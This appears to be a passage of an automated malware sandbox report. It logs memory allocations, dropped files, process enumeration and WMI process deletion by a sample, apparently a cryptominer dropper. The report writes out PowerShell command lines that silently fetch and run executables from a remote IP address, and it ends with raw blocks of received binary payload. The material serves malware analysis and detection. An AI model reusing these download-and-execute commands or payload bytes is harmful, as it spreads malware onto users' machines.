protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02736000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02738000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02739000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05015000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05016000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05017000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05018000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05019000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05020000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05021000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Windows (x86)\KBDMLT48.DLL
file C:\Windows (x86)\KBDBE.DLL
file C:\Windows (x86)\KBDCZ1.DLL
file C:\Windows (x86)\TRACERT.EXE
file C:\Windows (x86)\KBDLT.DLL
file C:\Windows (x86)\KBDMYAN.DLL
file C:\Windows (x86)\KBDAZST.DLL
file C:\Windows (x86)\KBDNTL.DLL
file C:\Windows (x86)\KBDA2.DLL
file C:\Windows (x86)\KBDBENE.DLL
file C:\Windows (x86)\icmp.dll
file C:\Windows (x86)\KBDINDEV.DLL
file C:\Windows (x86)\asferror.dll
file C:\Windows (x86)\kbdgeoer.dll
file C:\Windows (x86)\KBDPASH.DLL
file C:\Windows (x86)\KBDBR.DLL
file C:\Windows (x86)\tier2punctuations.dll
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
file C:\Windows (x86)\KBDMONST.DLL
file C:\Windows (x86)\KBDHU.DLL
file C:\Windows (x86)\KBDSMSFI.DLL
file C:\Windows (x86)\KBDUKX.DLL
file C:\Windows (x86)\kbdax2.dll
file C:\Windows (x86)\KBDFR.DLL
file C:\Windows (x86)\KBDYCC.DLL
file C:\Windows (x86)\KBDINBE1.DLL
file C:\Windows (x86)\kbd101a.dll
file C:\Windows (x86)\KBDTUF.DLL
file C:\Windows (x86)\KBDBLR.DLL
file C:\Windows (x86)\KBDTUQ.DLL
file C:\Windows (x86)\KBDFTHRK.DLL
file C:\Windows (x86)\KBDIBO.DLL
file C:\Windows (x86)\kbd106.dll
file C:\Windows (x86)\KBDLT2.DLL
file C:\Windows (x86)\KBDTH3.DLL
file C:\Windows (x86)\KBDIT142.DLL
file C:\Windows (x86)\KBDSL1.DLL
file C:\Windows (x86)\KBDRU.DLL
file C:\Windows (x86)\KBDUSL.DLL
file C:\Windows (x86)\KBDJAV.DLL
file C:\Windows (x86)\KBDMACST.DLL
file C:\Windows (x86)\KBDUSX.DLL
file C:\Windows (x86)\KBDDV.DLL
file C:\Windows (x86)\kbdgeoqw.dll
file C:\Windows (x86)\KBDMAORI.DLL
file C:\Windows (x86)\KBDLV1.DLL
file C:\Windows (x86)\KBDINUK2.DLL
file C:\Windows (x86)\KBDINASA.DLL
file C:\Windows (x86)\KBDINORI.DLL
file C:\Windows (x86)\KBDIR.DLL
file C:\Users\test22\AppData\Local\Temp\updateW\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
cmdline PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
file C:\Users\test22\AppData\Local\Temp\updateW\a.vbs
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file C:\Windows (x86)\explorer.exe
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
wmi SELECT * FROM Win32_Process WHERE ExecutablePath='C:\\Windows (x86)\\explorer.exe'
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
1 1 0

CreateProcessInternalW

 thread_identifier: 2196
thread_handle: 0x00000090
process_identifier: 260
current_directory: C:\Users\test22\AppData\Local\Temp\updateW
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2852
thread_handle: 0x00000094
process_identifier: 2228
current_directory: C:\Users\test22\AppData\Local\Temp\updateW
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: cmd.exe
process_identifier: 2988
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: conhost.exe
process_identifier: 2532
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: WmiPrvSE.exe
process_identifier: 2660
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: PING.EXE
process_identifier: 3020
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: explorer.exe
process_identifier: 2196
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000240
process_name: taskhost.exe
process_identifier: 2092
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received pÿ0è¨ïƒÄ…ÀyƒÈÿ]ÍD$Pjÿt$ÿt$ÿt$è»ÿÿÿƒÄËL$èÂSU‹Ù½VW‹s‹{ë&ƒ=XD|þrj@Wÿ3èý+õ;õsÖ_^][Á켋”$ÀSUV‹‚ø‹´$ÐWjY¼$ŒÇD$rón<󥋲ô|$LjYó¥‹0¹gæ j‹xöRQ‹‚ü÷Œh›‹\$d‰L$(¹…®g»‰L$0‹‹@ò«Ùƒ‹L$\5Íà[‰D$D3í‹D$h‰D$<‹D$`‰D$‹D$X‰D$,‹D$T‰D$8‹D$P‰D$ ‹D$L‰l$‰l$H‹l$D‰D$‹D$ÇD$$:õO¥‰\$@‰L$4¶€0C‹„„ŒÁ‹L$ȋD$(‰L$3΋t$4ÁÁÁ3ð‰D$(‹D$ÁÎ ‰t$4¶€1C‹„„ŒƋt$ð‹D$4‰t$3ñ‹L$(ÁÎÎ3Á‰L$(ÁȉD$4‹D$‹L$ ¶€2C‹„„ŒD$ȋD$0‰L$ 3ϋ|$ÁÁÁ3ø‰D$0‹D$ÁÏ ‰|$¶€3C‹„„ŒNj|$ ø‹D$‰|$ 3ù‹L$0ÁÏÏ3Á‰L$0ÁȉD$‹D$¶€4C‹„„ŒË\$8؋D$‹Ë3ʋT$@ÁÁÁ3ЉD$‹D$ÁÊ ¶€5C‹„„ŒÂ؋D$‰\$83ًL$,ÁËÃ3ЉD$ÁʉT$@‹T$¶‚6C‹„„ŒD$<ȋD$$‰L$,3͋l$<ÁÁÁ3è‰D$$¶‚7C‹T$,ÁÍ ‹„„ŒÅЋD$$‰T$,3ыL$ÁÊÂ3è‰D$$Á͉l$<‹l$¶…8C‹„„ŒD$ȋD$‰L$3ʋT$ÁÁÁ3ЉD$¶…9C‹l$ÁÊ ‹„„ŒÂè‹D$‰l$‰l$L3é‹L$ ÁÍÅ3ЉD$‰D$t‹D$ÁʉT$‰T$`¶€:C‹T$@‹„„ŒÂȉL$ 3΋D$$‹t$ ÁÁÁ3ЉD$$‹D$ÁÊ ¶€;C‹„„ŒÂð‹D$$‰t$ ‰t$P3ñ‹L$8ÁÎÆ3ЉD$$‰D$x‹D$ÁʉT$@‰T$d¶€<C‹T$<‹„„ŒÂȋD$(‰L$83ϋ|$8ÁÁÁ3ЉD$(‹D$ÁÊ ¶€=C‹„„ŒÂø‹D$(‰|$8‰|$T3ù‹L$,ÁÏÇ3ЉD$(ÁʉT$<‰T$h‹T$‰D$l¶‚>C‹„„ŒD$4ȋD$0‰L$,3ˋ\$4ÁÁÁ3؉D$0¶‚?C‹T$,ÁË ‹„„ŒÃЉT$,‰T$X3ÑÁÊ‹D$0Â3؉D$0‰D$p‹D$Á˃À‰\$4‹L$4‰\$\‹\$@‰D$=†Püÿÿ‰”$„‹”$Љ¬$ˆ‹l$H‰t$|‰¼$€‹Šô‹D,l3)3D,L‰)ƒÅƒý rä_^][Ä¼ÂU‹ìƒäðƒìx‹MVW‹ô‰D$<( (h‹ø)l$@)d$p(‹E fC‹H‹P‹p‹8fnÑfnÂfnÎfbÊfn÷fbðfbñfþô‰t$$‹pfþõfïމ|$,‹x (ûfrófr׉L$‹Hfïû(ï‰T$ fþ-p«C‹P(ÅfïD$@(àfnÏfrÐ frôfnÒfïàfbÊfnÆfnÙfbØfbÙfþމt$‹p0fþÜfïû)\$P(߉|$(‹x8frófr׉T$fï߉L$(Ӊ|$4fþÕfpۓ(‰t$0fïÄfpâN(ÈfrÐfrñfïÈfpé9‹P(‹H fn׋x<fnƋp4fnÊfbÊfnùfbøfbùfþ|$Pfþý‰|$8‹x,fïߋ@$(ÃfrÐfró‰|$ fïË|$8fnL$ (ð)D$Pfþô(ÆfnØfïÅfn×(àfbÊfrÐ frôfïàfnÆfbØ(D$PfbÙfþßfn|$4fþÜfïÃ)\$`(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÖfrÐfrñfïÈfnÀfbøfpé“fnL$ fbÊfbùfþ|$`fþýfïß(ÃfrófrÐfïÃ(ð)D$`fþô(ÆfïÅ(àfrÐ frôfnT$fïàfnÇfnÉfbÊfnÚfbØ(D$`fbÙfþßfn|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnD$ fbøfpé9fnL$,fbÊfbùfþ|$PfnT$(fþýfïßfnL$$(ÃfbÊfrÐfrófïÃfn\$0(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(Èfn×frñfrÐfïÈfnD$fpé“fnL$0fn|$ fbøfbÊfbùfþ|$PfþýfnL$,fïßfnÖ(ÃfbÊfrÐfrófïÃfnÙ(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$$fbØ(D$`fbÙfþßfnúfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâN(ÈfnÐfrÐfrñfïÈfnD$fbøfpé9fnL$(fbÊfbùfþ|$PfnT$ fþýfnL$fïß(ÃfbÊfrÐfrófïÃfn\$4(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$fbØ(D$`fbÙfþßfþÜ)\$PfïÃfn|$(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$ (ÈfrÐfrñfïÈfnÆfbøfpé“fnL$(fbÊfbùfþ|$PfnT$4fþýfïßfnL$(ÃfbÊfrÐfrófïÃfnØ(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$0fbØ(D$`fbÙfþßfn|$$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâN(Èfn×frÐfrñfïÈfnD$ fpé9fnL$fbøfbÊfbùfþ|$Pfþýfïß(ÃfrófrÐfïÃ)D$`(ðfn\$fþôfnÑ(ÆfnÊfïÅfbÊ(àfrÐ frôfïàfnD$,fbØ(D$`fbÙfþßfnøfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÒfrÐfrñfïÈfnD$$fbøfpé“fnL$fbÊfbùfþ|$PfnL$fþýfïßfn×(ÃfbÊfrÐfrófïÃfn\$,(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$ fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfþÖ(ÂfïÄ(ÈfrÐfrñfïÈfn|$4fnD$fbøfp
Data received é9fnL$ fpâNfnT$(fbÊfbùfþ|$PfpۓfþýfïßfnL$0(ÃfnÖfrÐfrófbÊfïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnÁfbØ(D$`fbÙfþßfn|$$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÑfrÐfrñfïÈfnD$,fbøfpé“fnL$fbÊfnT$(fbùfþ|$PfþýfnÊfïß(ÃfrófrÐfïÃfn\$0(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$ fbØ(D$`fbÊfbÙfþßfn|$ fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnÇfbøfpé9fnL$fbÊfbùfþ|$PfnL$fþýfïßfnÐ(ÃfbÊfrÐfrófïÃfnÞ(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$4fbØ(D$`fbÙfþßfn|$0fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$ (ÈfrñfrÐfïÈfnD$4fpé“fnL$fbøfbÊfbùfþ|$PfþýfnÒfïßfnÏ(ÃfbÊfrÐfrófïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnÆfbØ(D$`
Data received E;Ð|;ËwMUë‹M‹U‹Á[]ÂSUVW‹ñ3Ûè)üÿÿ‹ø…ÿt9‹l$ƒýt ƒ¾Ü!t'CöÃuèº9®Ü!t‹Îè"áÿÿ‹Îèðûÿÿ‹ø…ÿuË3À_^][‹ÇëõSVW‹ñ3Ûë<ƒ¾Ü!t>CöÃuè̹ƒ¾Ü!uÿt$†èEPèÎáYY…Àt‹ÎèÅàÿÿ‹Îè“ûÿÿ‹ø…ÿu¹3À_^[‹ÇëöV‹ñè¦W9†lu9–”lu9†˜lu9–œltFPj8èeÕÿÿj¹èËCè¸/^Ãÿt$APj"èúàÿÿj¹èËCè›/ÂU‹ìƒìL‹EM´ƒeôƒeø‰EüèÿÁ‹å]¸p«CÃU‹ìÿuÿuÿuÿu ÿuèãÿÿÿÿpÿ0èòôƒÄ…ÀyƒÈÿ]ÍD$Pjÿt$ÿt$ÿt$è»ÿÿÿƒÄËL$èÂSU‹Ù½VW‹s‹{ë&ƒ=hD|þrj@Wÿ3èý+õ;õsÖ_^][Á켋”$ÀSUV‹‚ø‹´$ÐWjY¼$ŒÇD$rón<󥋲ô|$LjYó¥‹0¹gæ j‹xöRQ‹‚ü÷Œh›‹\$d‰L$(¹…®g»‰L$0‹‹@ò«Ùƒ‹L$\5Íà[‰D$D3í‹D$h‰D$<‹D$`‰D$‹D$X‰D$,‹D$T‰D$8‹D$P‰D$ ‹D$L‰l$‰l$H‹l$D‰D$‹D$ÇD$$:õO¥‰\$@‰L$4¶€ˆC‹„„ŒÁ‹L$ȋD$(‰L$3΋t$4ÁÁÁ3ð‰D$(‹D$ÁÎ ‰t$4¶€‰C‹„„ŒƋt$ð‹D$4‰t$3ñ‹L$(ÁÎÎ3Á‰L$(ÁȉD$4‹D$‹L$ ¶€ŠC‹„„ŒD$ȋD$0‰L$ 3ϋ|$ÁÁÁ3ø‰D$0‹D$ÁÏ ‰|$¶€‹C‹„„ŒNj|$ ø‹D$‰|$ 3ù‹L$0ÁÏÏ3Á‰L$0ÁȉD$‹D$¶€ŒC‹„„ŒË\$8؋D$‹Ë3ʋT$@ÁÁÁ3ЉD$‹D$ÁÊ ¶€C‹„„ŒÂ؋D$‰\$83ًL$,ÁËÃ3ЉD$ÁʉT$@‹T$¶‚ŽC‹„„ŒD$<ȋD$$‰L$,3͋l$<ÁÁÁ3è‰D$$¶‚C‹T$,ÁÍ ‹„„ŒÅЋD$$‰T$,3ыL$ÁÊÂ3è‰D$$Á͉l$<‹l$¶…C‹„„ŒD$ȋD$‰L$3ʋT$ÁÁÁ3ЉD$¶…‘C‹l$ÁÊ ‹„„ŒÂè‹D$‰l$‰l$L3é‹L$ ÁÍÅ3ЉD$‰D$t‹D$ÁʉT$‰T$`¶€’C‹T$@‹„„ŒÂȉL$ 3΋D$$‹t$ ÁÁÁ3ЉD$$‹D$ÁÊ ¶€“C‹„„ŒÂð‹D$$‰t$ ‰t$P3ñ‹L$8ÁÎÆ3ЉD$$‰D$x‹D$ÁʉT$@‰T$d¶€”C‹T$<‹„„ŒÂȋD$(‰L$83ϋ|$8ÁÁÁ3ЉD$(‹D$ÁÊ ¶€•C‹„„ŒÂø‹D$(‰|$8‰|$T3ù‹L$,ÁÏÇ3ЉD$(ÁʉT$<‰T$h‹T$‰D$l¶‚–C‹„„ŒD$4ȋD$0‰L$,3ˋ\$4ÁÁÁ3؉D$0¶‚—C‹T$,ÁË ‹„„ŒÃЉT$,‰T$X3ÑÁÊ‹D$0Â3؉D$0‰D$p‹D$Á˃À‰\$4‹L$4‰\$\‹\$@‰D$=†Püÿÿ‰”$„‹”$Љ¬$ˆ‹l$H‰t$|‰¼$€‹Šô‹D,l3)3D,L‰)ƒÅƒý rä_^][Ä¼ÂU‹ìƒäðƒìx‹MVW‹ô‰D$<( (h‹ø)l$@)d$p(‹E fC‹H‹P‹p‹8fnÑfnÂfnÎfbÊfn÷fbðfbñfþô‰t$$‹pfþõfïމ|$,‹x (ûfrófr׉L$‹Hfïû(ï‰T$ fþ-€«C‹P(ÅfïD$@(àfnÏfrÐ frôfnÒfïàfbÊfnÆfnÙfbØfbÙfþމt$‹p0fþÜfïû)\$P(߉|$(‹x8frófr׉T$fï߉L$(Ӊ|$4fþÕfpۓ(‰t$0fïÄfpâN(ÈfrÐfrñfïÈfpé9‹P(‹H fn׋x<fnƋp4fnÊfbÊfnùfbøfbùfþ|$Pfþý‰|$8‹x,fïߋ@$(ÃfrÐfró‰|$ fïË|$8fnL$ (ð)D$Pfþô(ÆfnØfïÅfn×(àfbÊfrÐ frôfïàfnÆfbØ(D$PfbÙfþßfn|$4fþÜfïÃ)\$`(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÖfrÐfrñfïÈfnÀfbøfpé“fnL$ fbÊfbùfþ|$`fþýfïß(ÃfrófrÐfïÃ(ð)D$`fþô(ÆfïÅ(àfrÐ frôfnT$fïàfnÇfnÉfbÊfnÚfbØ(D$`fbÙfþßfn|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnD$ fbøfpé9fnL$,fbÊfbùfþ|$PfnT$(fþýfïßfnL$$(ÃfbÊfrÐfrófïÃfn\$0(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(Èfn×frñfrÐfïÈfnD$fpé“fnL$0fn|$ fbøfbÊfbùfþ|$PfþýfnL$,fïßfnÖ(ÃfbÊfrÐfrófïÃfnÙ(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$$fbØ(D$`fbÙfþßfnúfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâN(ÈfnÐfrÐfrñfïÈfnD$fbøfpé9fnL$(fbÊfbùfþ|$PfnT$ fþýfnL$fïß(ÃfbÊfrÐfrófïÃfn\$4(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$fbØ(D$`fbÙfþßfþÜ)\$PfïÃfn|$(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$ (ÈfrÐfrñfïÈfnÆfbøfpé“fnL$(fbÊfbùfþ|$PfnT$4fþýfïßfnL$(ÃfbÊfrÐfrófïÃfnØ(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$0fbØ(D$`fbÙfþßfn|$$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâN(Èfn×frÐfrñfïÈfnD$ fpé9fnL$fbøfbÊfbùfþ|$Pfþýfïß(ÃfrófrÐfïÃ
Data received )D$`(ðfn\$fþôfnÑ(ÆfnÊfïÅfbÊ(àfrÐ frôfïàfnD$,fbØ(D$`fbÙfþßfnøfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÒfrÐfrñfïÈfnD$$fbøfpé“fnL$fbÊfbùfþ|$PfnL$fþýfïßfn×(ÃfbÊfrÐfrófïÃfn\$,(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$ fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfþÖ(ÂfïÄ(ÈfrÐfrñfïÈfn|$4fnD$fbøfpé9fnL$ fpâNfnT$(fbÊfbùfþ|$PfpۓfþýfïßfnL$0(ÃfnÖfrÐfrófbÊfïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnÁfbØ(D$`fbÙfþßfn|$$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÑfrÐfrñfïÈfnD$,fbøfpé“fnL$fbÊfnT$(fbùfþ|$PfþýfnÊfïß(ÃfrófrÐfïÃfn\$0(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$ fbØ(D$`fbÊfbÙfþßfn|$ fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnÇfbøfpé9fnL$fbÊfbùfþ|$PfnL$fþýfïßfnÐ(ÃfbÊfrÐfrófïÃfnÞ(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$4fbØ(D$`fbÙfþßfn|$0fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$ (ÈfrñfrÐfïÈfnD$4fpé“fnL$fbøfbÊfbùfþ|$PfþýfnÒfïßfnÏ(ÃfbÊfrÐfrófïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnÆfbØ(D$`fbÙfþßfn|$,fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâN(ÈfnÑfrÐfrñfïÈfnÀfbøfpé9fnL$fbÊfbùfþ|$PfnT$ 